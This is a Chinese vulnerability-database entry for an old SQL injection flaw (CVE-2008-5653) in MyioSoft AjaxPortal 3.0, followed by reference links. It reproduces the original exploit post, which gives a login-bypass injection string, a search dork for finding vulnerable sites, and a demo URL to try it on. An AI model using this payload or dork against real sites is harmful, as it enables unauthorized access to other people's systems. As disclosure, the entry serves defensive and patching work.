https://www.exploit-db.com/exploits/7044
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-345
MyioSoft AjaxPortal 'ajaxp.php'SQL注入攻击漏洞






漏洞ID | 1116675 | 漏洞类型 | SQL注入 |
发布时间 | 2008-11-07 | 更新时间 | 2008-12-24 |
![]() |
CVE-2008-5653 | ![]() |
CNNVD-200812-345 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
MyioSoftAjaxPortal是一款制作个人门户网站入口的软件。MyioSoftAjaxPortal3.0版本的ajaxp.php中的loginADP函数中存在SQL注入漏洞。远程攻击者可以借助可以通过用户名参数获得的rsargs参数,执行任意SQL指令。
|漏洞EXP
[~] MyioSoft Ajax Portal 3.0 Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 07.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: "Powered by Ajax Portal 3.0"
[~]
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://myiosoft.com/products/AjaxPortal/demo/
example for demo:
admin: demo1 ' or ' 1=1
passwd: ZoRLu
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-07]
|参考资料
来源:BID
名称:32199
链接:http://www.securityfocus.com/bid/32199
来源:SECUNIA
名称:32673
链接:http://secunia.com/advisories/32673
来源:OSVDB
名称:49700
链接:http://osvdb.org/49700
来源:MILW0RM
名称:7044
链接:http://milw0rm.com/exploits/7044
检索漏洞
开始时间
结束时间